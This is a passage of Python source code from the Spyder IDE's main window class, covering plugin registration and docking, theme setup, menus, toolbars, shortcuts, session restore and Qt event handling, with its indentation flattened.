spyder/plugins/base::_switch_to_plugin.
See spyder-ide/spyder#15164
Parameters
----------
restore : bool, optional
If the current dockwidget needs to be restored to its unmaximized
state. The default is False.
"""
self.layouts.maximize_dockwidget(restore=restore)
def switch_to_plugin(self, plugin, force_focus=None):
"""
Switch to this plugin.
Notes
-----
This operation unmaximizes the current plugin (if any), raises
this plugin to view (if it's hidden) and gives it focus (if
possible).
"""
last_plugin = self.last_plugin
try:
# New API
if (last_plugin is not None
and last_plugin.get_widget().is_maximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
except AttributeError:
# Old API
if (last_plugin is not None and self.last_plugin._ismaximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
try:
# New API
if not plugin.toggle_view_action.isChecked():
plugin.toggle_view_action.setChecked(True)
plugin.get_widget().is_visible = False
except AttributeError:
# Old API
if not plugin._toggle_view_action.isChecked():
plugin._toggle_view_action.setChecked(True)
plugin._widget._is_visible = False
plugin.change_visibility(True, force_focus=force_focus)
def remove_dockwidget(self, plugin):
"""
Remove a plugin QDockWidget from the main window.
"""
self.removeDockWidget(plugin.dockwidget)
try:
self.widgetlist.remove(plugin)
except ValueError:
pass
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets."""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
def tabify_plugin(self, plugin, default=None):
"""
Tabify the plugin using the list of possible TABIFY options.
Only do this if the dockwidget does not have more dockwidgets
in the same position and if the plugin is using the New API.
"""
def tabify_helper(plugin, next_to_plugins):
for next_to_plugin in next_to_plugins:
try:
self.tabify_plugins(next_to_plugin, plugin)
break
except SpyderAPIError as err:
logger.error(err)
# If TABIFY not defined use the [default]
tabify = getattr(plugin, 'TABIFY', [default])
if not isinstance(tabify, list):
next_to_plugins = [tabify]
else:
next_to_plugins = tabify
# Check if TABIFY is not a list with None as unique value or a default
# list
if tabify in [[None], []]:
return False
# Get the actual plugins from the names
next_to_plugins = [self.get_plugin(p) for p in next_to_plugins]
# First time plugin starts
if plugin.get_conf('first_time', True):
if (isinstance(plugin, SpyderDockablePlugin)
and plugin.NAME != Plugins.Console):
logger.info(
"Tabify {} dockwidget for the first time...".format(
plugin.NAME))
tabify_helper(plugin, next_to_plugins)
# Show external plugins
if plugin.NAME in PLUGIN_REGISTRY.external_plugins:
plugin.get_widget().toggle_view(True)
plugin.set_conf('enable', True)
plugin.set_conf('first_time', False)
else:
# This is needed to ensure plugins are placed correctly when
# switching layouts.
logger.info("Tabify {} dockwidget...".format(plugin.NAME))
# Check if plugin has no other dockwidgets in the same position
if not bool(self.tabifiedDockWidgets(plugin.dockwidget)):
tabify_helper(plugin, next_to_plugins)
return True
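    # Illustrative sketch (not part of Spyder): tabify_plugin() above reads
    # the plugin's TABIFY attribute on first start to decide where to dock
    # its widget. A hypothetical external plugin could declare it like this
    # (MyPlugin and its placement are assumptions for the example):
    #
    #     class MyPlugin(SpyderDockablePlugin):
    #         NAME = 'my_plugin'
    #         TABIFY = [Plugins.Help, Plugins.VariableExplorer]
    #
    # Each entry is tried in order and the widget is tabified next to the
    # first plugin that is actually available.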
def handle_exception(self, error_data):
"""
This method will call the handle exception method of the Console
plugin. It is provided as a signal on the Plugin API for convenience,
        so that plugins do not need to explicitly call the Console plugin.
Parameters
----------
error_data: dict
The dictionary containing error data. The expected keys are:
>>> error_data= {
"text": str,
"is_traceback": bool,
"repo": str,
"title": str,
"label": str,
"steps": str,
}
Notes
-----
The `is_traceback` key indicates if `text` contains plain text or a
Python error traceback.
The `title` and `repo` keys indicate how the error data should
customize the report dialog and Github error submission.
The `label` and `steps` keys allow customizing the content of the
error dialog.
"""
console = self.get_plugin(Plugins.Console, error=False)
if console:
console.handle_exception(error_data)
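    # Illustrative sketch (not part of Spyder): the error_data payload
    # described in the docstring above, as a plugin might emit it through
    # sig_exception_occurred (which register_plugin connects to
    # handle_exception). `plugin` and the message text are assumptions.
    #
    #     error_data = {
    #         "text": "Traceback (most recent call last): ...",
    #         "is_traceback": True,
    #         "repo": "spyder-ide/spyder",
    #         "title": "Error while refreshing the widget",
    #         "label": "",
    #         "steps": "",
    #     }
    #     plugin.sig_exception_occurred.emit(error_data)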
def __init__(self, splash=None, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if running_under_pytest():
self._proxy_style = None
else:
from spyder.utils.qthelpers import SpyderProxyStyle
# None is needed, see: https://bugreports.qt.io/browse/PYSIDE-922
self._proxy_style = SpyderProxyStyle(None)
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
# Set Windows app icon to use .ico file
if os.name == "nt":
qapp.setWindowIcon(ima.get_icon("windows_app_icon"))
# Set default style
self.default_style = str(qapp.style().objectName())
# Save command line options for plugins to access them
self._cli_options = options
logger.info("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
                # Make Spyder quit when pressing Ctrl+C in the console
# In DEV Ctrl+C doesn't quit, because it helps to
# capture the traceback when spyder freezes
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
            with open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')) as f:
                mac_style = f.read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Shortcut management data
self.shortcut_data = []
self.shortcut_queue = []
# Handle Spyder path
self.path = ()
self.not_active_path = ()
self.project_path = ()
self._path_manager = None
# New API
self._APPLICATION_TOOLBARS = OrderedDict()
self._STATUS_WIDGETS = OrderedDict()
        # Mapping of new plugin identifiers vs old attribute
        # names given for plugins or to prevent collisions with other
        # attributes, i.e. layout (Qt) vs layout (SpyderPluginV2)
self._INTERNAL_PLUGINS_MAPPING = {
'console': Plugins.Console,
'maininterpreter': Plugins.MainInterpreter,
'outlineexplorer': Plugins.OutlineExplorer,
'variableexplorer': Plugins.VariableExplorer,
'ipyconsole': Plugins.IPythonConsole,
'workingdirectory': Plugins.WorkingDirectory,
'projects': Plugins.Projects,
'findinfiles': Plugins.Find,
'layouts': Plugins.Layout,
}
self.thirdparty_plugins = []
# File switcher
self.switcher = None
# Preferences
self.prefs_dialog_size = None
self.prefs_dialog_instance = None
# Actions
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
# Menu bars
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
# TODO: Move to corresponding Plugins
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.menus = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
self.CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
        if set_windows_appusermodelid is not None:
res = set_windows_appusermodelid()
logger.info("appusermodelid: %s", res)
# Setting QTimer if running in travis
test_app = os.environ.get('TEST_CI_APP')
if test_app is not None:
app = qapplication()
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(app.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = splash
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.window_size = None
self.window_position = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See spyder-ide/spyder#4132.
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: {color}\'><b>netsh winsock reset "
"</b></span><br>").format(
color=QStylePalette.COLOR_BACKGROUND_4))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
# Apply main window settings
self.apply_settings()
# To set all dockwidgets tabs to be on top (in case we want to do it
# in the future)
# self.setTabPosition(Qt.AllDockWidgetAreas, QTabWidget.North)
logger.info("End of MainWindow constructor")
# ---- Window setup
def _update_shortcuts_in_panes_menu(self, show=True):
"""
Display the shortcut for the "Switch to plugin..." on the toggle view
action of the plugins displayed in the Help/Panes menu.
Notes
-----
SpyderDockablePlugins provide two actions that function as a single
action. The `Switch to Plugin...` action has an assignable shortcut
via the shortcut preferences. The `Plugin toggle View` in the `View`
        application menu uses a custom `Toggle view action` that displays the
shortcut assigned to the `Switch to Plugin...` action, but is not
triggered by that shortcut.
"""
for plugin_name in PLUGIN_REGISTRY:
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
if isinstance(plugin, SpyderDockablePlugin):
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if show:
section = plugin.CONF_SECTION
try:
context = '_'
name = 'switch to {}'.format(section)
shortcut = CONF.get_shortcut(
context, name, plugin_name=section)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = QKeySequence()
else:
shortcut = QKeySequence()
action.setShortcut(shortcut)
def setup(self):
"""Setup main window."""
PLUGIN_REGISTRY.sig_plugin_ready.connect(
lambda plugin_name, omit_conf: self.register_plugin(
plugin_name, omit_conf=omit_conf))
PLUGIN_REGISTRY.set_main(self)
# TODO: Remove circular dependency between help and ipython console
# and remove this import. Help plugin should take care of it
from spyder.plugins.help.utils.sphinxify import CSS_PATH, DARK_CSS_PATH
logger.info("*** Start of MainWindow setup ***")
logger.info("Updating PYTHONPATH")
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
logger.info("Applying theme configuration...")
ui_theme = CONF.get('appearance', 'ui_theme')
color_scheme = CONF.get('appearance', 'selected')
if ui_theme == 'dark':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
elif ui_theme == 'light':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
elif ui_theme == 'automatic':
if not is_dark_font_color(color_scheme):
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
else:
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
# Set css_path as a configuration to be used by the plugins
CONF.set('appearance', 'css_path', css_path)
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
# Switcher instance
logger.info("Loading switcher...")
self.create_switcher()
# Load and register internal and external plugins
external_plugins = find_external_plugins()
internal_plugins = find_internal_plugins()
all_plugins = external_plugins.copy()
all_plugins.update(internal_plugins.copy())
# Determine 'enable' config for the plugins that have it
enabled_plugins = {}
registry_internal_plugins = {}
registry_external_plugins = {}
for plugin in all_plugins.values():
plugin_name = plugin.NAME
# Disable panes that use web widgets (currently Help and Online
# Help) if the user asks for it.
# See spyder-ide/spyder#16518
if self._cli_options.no_web_widgets:
if "help" in plugin_name:
continue
plugin_main_attribute_name = (
self._INTERNAL_PLUGINS_MAPPING[plugin_name]
if plugin_name in self._INTERNAL_PLUGINS_MAPPING
else plugin_name)
if plugin_name in internal_plugins:
registry_internal_plugins[plugin_name] = (
plugin_main_attribute_name, plugin)
else:
registry_external_plugins[plugin_name] = (
plugin_main_attribute_name, plugin)
try:
if CONF.get(plugin_main_attribute_name, "enable"):
enabled_plugins[plugin_name] = plugin
PLUGIN_REGISTRY.set_plugin_enabled(plugin_name)
except (cp.NoOptionError, cp.NoSectionError):
enabled_plugins[plugin_name] = plugin
PLUGIN_REGISTRY.set_plugin_enabled(plugin_name)
PLUGIN_REGISTRY.set_all_internal_plugins(registry_internal_plugins)
PLUGIN_REGISTRY.set_all_external_plugins(registry_external_plugins)
# Instantiate internal Spyder 5 plugins
for plugin_name in internal_plugins:
if plugin_name in enabled_plugins:
PluginClass = internal_plugins[plugin_name]
if issubclass(PluginClass, SpyderPluginV2):
PLUGIN_REGISTRY.register_plugin(self, PluginClass,
external=False)
# Instantiate internal Spyder 4 plugins
for plugin_name in internal_plugins:
if plugin_name in enabled_plugins:
PluginClass = internal_plugins[plugin_name]
if issubclass(PluginClass, SpyderPlugin):
plugin_instance = PLUGIN_REGISTRY.register_plugin(
self, PluginClass, external=False)
self.preferences.register_plugin_preferences(
plugin_instance)
# Instantiate external Spyder 5 plugins
for plugin_name in external_plugins:
if plugin_name in enabled_plugins:
PluginClass = external_plugins[plugin_name]
try:
plugin_instance = PLUGIN_REGISTRY.register_plugin(
self, PluginClass, external=True)
except Exception as error:
print("%s: %s" % (PluginClass, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
self.set_splash(_("Loading old third-party plugins..."))
for mod in get_spyderplugins_mods():
try:
plugin = PLUGIN_REGISTRY.register_plugin(self, mod,
external=True)
if plugin.check_compatibility()[0]:
if hasattr(plugin, 'CONFIGWIDGET_CLASS'):
self.preferences.register_plugin_preferences(plugin)
if not hasattr(plugin, 'COMPLETION_PROVIDER_NAME'):
self.thirdparty_plugins.append(plugin)
# Add to dependencies dialog
module = mod.__name__
name = module.replace('_', '-')
if plugin.DESCRIPTION:
description = plugin.DESCRIPTION
else:
description = plugin.get_plugin_title()
dependencies.add(module, name, description,
'', None, kind=dependencies.PLUGIN)
except TypeError:
# Fixes spyder-ide/spyder#13977
pass
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
# Set window title
self.set_window_title()
# Menus
# TODO: Remove when all menus are migrated to use the Main Menu Plugin
logger.info("Creating Menus...")
from spyder.plugins.mainmenu.api import (
ApplicationMenus, ToolsMenuSections, FileMenuSections)
mainmenu = self.mainmenu
self.edit_menu = mainmenu.get_application_menu("edit_menu")
self.search_menu = mainmenu.get_application_menu("search_menu")
self.source_menu = mainmenu.get_application_menu("source_menu")
self.source_menu.aboutToShow.connect(self.update_source_menu)
self.run_menu = mainmenu.get_application_menu("run_menu")
self.debug_menu = mainmenu.get_application_menu("debug_menu")
# Switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_switcher,
context=Qt.ApplicationShortcut,
id_='file_switcher')
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut,
id_='symbol_finder')
self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_shortcut_to_tip=True)
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions += [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action,
None]
if self.get_plugin(Plugins.Editor, error=False):
self.edit_menu_actions += self.editor.edit_menu_actions
switcher_actions = [
self.file_switcher_action,
self.symbol_finder_action
]
for switcher_action in switcher_actions:
mainmenu.add_item_to_application_menu(
switcher_action,
menu_id=ApplicationMenus.File,
section=FileMenuSections.Switcher,
before_section=FileMenuSections.Restart)
self.set_splash("")
# Toolbars
# TODO: Remove after finishing the migration
logger.info("Creating toolbars...")
toolbar = self.toolbar
self.file_toolbar = toolbar.get_application_toolbar("file_toolbar")
self.run_toolbar = toolbar.get_application_toolbar("run_toolbar")
self.debug_toolbar = toolbar.get_application_toolbar("debug_toolbar")
self.main_toolbar = toolbar.get_application_toolbar("main_toolbar")
# Tools + External Tools (some of this depends on the Application
# plugin)
logger.info("Creating Tools menu...")
spyder_path_action = create_action(
self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.show_path_manager,
tip=_("PYTHONPATH manager"),
id_='spyder_path_action')
from spyder.plugins.application.container import (
ApplicationActions, WinUserEnvDialog)
winenv_action = None
if WinUserEnvDialog:
winenv_action = ApplicationActions.SpyderWindowsEnvVariables
mainmenu.add_item_to_application_menu(
spyder_path_action,
menu_id=ApplicationMenus.Tools,
section=ToolsMenuSections.Tools,
before=winenv_action,
before_section=ToolsMenuSections.External
)
# Main toolbar
from spyder.plugins.toolbar.api import (
ApplicationToolbars, MainToolbarSections)
self.toolbar.add_item_to_application_toolbar(
spyder_path_action,
toolbar_id=ApplicationToolbars.Main,
section=MainToolbarSections.ApplicationSection
)
self.set_splash(_("Setting up main window..."))
# TODO: Migrate to use the MainMenu Plugin instead of list of actions
# Filling out menu/toolbar entries:
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
def __getattr__(self, attr):
"""
Redefinition of __getattr__ to enable access to plugins.
Loaded plugins can be accessed as attributes of the mainwindow
as before, e.g self.console or self.main.console, preserving the
same accessor as before.
"""
        # Mapping of new plugin identifiers vs old attribute
# names given for plugins
try:
if attr in self._INTERNAL_PLUGINS_MAPPING.keys():
return self.get_plugin(
self._INTERNAL_PLUGINS_MAPPING[attr], error=False)
return self.get_plugin(attr)
except SpyderAPIError:
pass
return super().__getattr__(attr)
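    # Illustrative sketch (not part of Spyder): thanks to __getattr__ above,
    # the old attribute-style accessors still resolve through the plugin
    # registry, so both lines below reach the same plugin instance
    # (`main_window` is an assumed reference to a MainWindow object):
    #
    #     editor = main_window.editor                      # old accessor
    #     editor = main_window.get_plugin(Plugins.Editor)  # new API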
def pre_visible_setup(self):
"""
Actions to be performed before the main window is visible.
The actions here are related with setting up the main window.
"""
logger.info("Setting up window...")
for plugin_name in PLUGIN_REGISTRY:
plugin_instance = PLUGIN_REGISTRY.get_plugin(plugin_name)
try:
plugin_instance.before_mainwindow_visible()
except AttributeError:
pass
# Tabify external plugins which were installed after Spyder was
# installed.
# Note: This is only necessary the first time a plugin is loaded.
        # Afterwards, the plugin placement is recorded in the window hexstate,
# which is loaded by the layouts plugin during the next session.
for plugin_name in PLUGIN_REGISTRY.external_plugins:
plugin_instance = PLUGIN_REGISTRY.get_plugin(plugin_name)
if plugin_instance.get_conf('first_time', True):
self.tabify_plugin(plugin_instance, Plugins.Console)
if self.splash is not None:
self.splash.hide()
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
child.aboutToShow.connect(self.update_search_menu)
except TypeError:
pass
# Register custom layouts
for plugin_name in PLUGIN_REGISTRY.external_plugins:
plugin_instance = PLUGIN_REGISTRY.get_plugin(plugin_name)
if hasattr(plugin_instance, 'CUSTOM_LAYOUTS'):
if isinstance(plugin_instance.CUSTOM_LAYOUTS, list):
for custom_layout in plugin_instance.CUSTOM_LAYOUTS:
self.layouts.register_layout(
self, custom_layout)
else:
logger.info(
'Unable to load custom layouts for {}. '
'Expecting a list of layout classes but got {}'
.format(plugin_name, plugin_instance.CUSTOM_LAYOUTS)
)
self.layouts.update_layout_menu_actions()
logger.info("*** End of MainWindow setup ***")
self.is_starting_up = False
def post_visible_setup(self):
"""
Actions to be performed only after the main window's `show` method
is triggered.
"""
# Process pending events and hide splash before loading the
# previous session.
QApplication.processEvents()
if self.splash is not None:
self.splash.hide()
# Call on_mainwindow_visible for all plugins.
for plugin_name in PLUGIN_REGISTRY:
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
try:
plugin.on_mainwindow_visible()
QApplication.processEvents()
except AttributeError:
pass
self.restore_scrollbar_position.emit()
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (
CONF.get('main', 'single_instance') and
not self._cli_options.new_instance and
self.open_files_server
):
t = threading.Thread(target=self.start_open_files_server)
t.daemon = True
t.start()
# Connect the window to the signal emitted by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Update plugins toggle actions to show the "Switch to" plugin shortcut
self._update_shortcuts_in_panes_menu()
# Reopen last session if no project is active
# NOTE: This needs to be after the calls to on_mainwindow_visible
self.reopen_last_session()
# Raise the menuBar to the top of the main window widget's stack
# Fixes spyder-ide/spyder#3887.
self.menuBar().raise_()
# To avoid regressions. We shouldn't have loaded the modules
# below at this point.
if DEV is not None:
assert 'pandas' not in sys.modules
assert 'matplotlib' not in sys.modules
# Restore undocked plugins
self.restore_undocked_plugins()
# Notify that the setup of the mainwindow was finished
self.is_setting_up = False
self.sig_setup_finished.emit()
def reopen_last_session(self):
"""
Reopen last session if no project is active.
This can't be moved to on_mainwindow_visible in the editor because we
need to let the same method on Projects run first.
"""
projects = self.get_plugin(Plugins.Projects, error=False)
editor = self.get_plugin(Plugins.Editor, error=False)
reopen_last_session = False
if projects:
if projects.get_active_project() is None:
reopen_last_session = True
else:
reopen_last_session = True
if editor and reopen_last_session:
editor.setup_open_files(close_previous_files=False)
def restore_undocked_plugins(self):
"""Restore plugins that were undocked in the previous session."""
logger.info("Restoring undocked plugins from the previous session")
for plugin_name in PLUGIN_REGISTRY:
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
if isinstance(plugin, SpyderDockablePlugin):
if plugin.get_conf('undocked_on_window_close', default=False):
plugin.get_widget().create_window()
elif isinstance(plugin, SpyderPluginWidget):
if plugin.get_option('undocked_on_window_close',
default=False):
plugin._create_window()
def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
elif running_in_mac_app() or is_pynsist():
title = "Spyder"
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if get_debug_level():
title += u" [DEBUG MODE %d]" % get_debug_level()
window_title = self._cli_options.window_title
if window_title is not None:
title += u' -- ' + to_text_string(window_title)
# TODO: Remove self.projects reference once there's an API for setting
# window title.
projects = self.get_plugin(Plugins.Projects, error=False)
if projects:
path = projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
# TODO: To be removed after all actions are moved to their corresponding
# plugins
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_shortcut_to_tip=True, plugin_name=None):
shortcuts = self.get_plugin(Plugins.Shortcuts, error=False)
if shortcuts:
shortcuts.register_shortcut(
qaction_or_qshortcut,
context,
name,
add_shortcut_to_tip=add_shortcut_to_tip,
plugin_name=plugin_name,
)
# --- Other
def update_source_menu(self):
"""Update source menu options that vary dynamically."""
# This is necessary to avoid an error at startup.
# Fixes spyder-ide/spyder#14901
try:
editor = self.get_plugin(Plugins.Editor, error=False)
if editor:
editor.refresh_formatter_name()
except AttributeError:
pass
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(action._shown_shortcut)
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.show_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(QKeySequence())
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.hide_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_options_menus(self):
"""Hide options menu when menubar is pressed in macOS."""
for plugin in self.widgetlist + self.thirdparty_plugins:
if plugin.CONF_SECTION == 'editor':
editorstack = self.editor.get_current_editorstack()
editorstack.menu.hide()
else:
try:
# New API
plugin.options_menu.hide()
except AttributeError:
# Old API
plugin._options_menu.hide()
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
widget = QApplication.focusWidget()
textedit_properties = None
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
console = isinstance(widget, ControlWidget)
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
if hasattr(self, 'editor'):
# Editor has focus and there is no file opened in it
if (not console and not_readonly and self.editor
and not self.editor.is_file_opened()):
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
        self.undo_action.setEnabled(
            readwrite_editor and widget.document().isUndoAvailable())
        self.redo_action.setEnabled(
            readwrite_editor and widget.document().isRedoAvailable())
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
if self.get_plugin(Plugins.Editor, error=False):
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
# Disabling all actions except the last one
# (which is Find in files) to begin with
for child in self.search_menu.actions()[:-1]:
child.setEnabled(False)
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Find actions only trigger an effect in the Editor
if not console:
for action in self.search_menu.actions():
try:
action.setEnabled(True)
except RuntimeError:
pass
# Disable the replace action for read-only files
if len(self.search_menu_actions) > 3:
self.search_menu_actions[3].setEnabled(readwrite_editor)
def createPopupMenu(self):
return self.application.get_application_context_menu(parent=self)
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
logger.info(message)
self.splash.show()
self.splash.showMessage(message,
int(Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute),
QColor(Qt.white))
QApplication.processEvents()
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if hasattr(self, 'layouts'):
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: Remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(
self.last_focused_widget):
plugin.change_visibility(True)
except AttributeError:
# Old API
if plugin.isAncestorOf(self.last_focused_widget):
plugin._visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
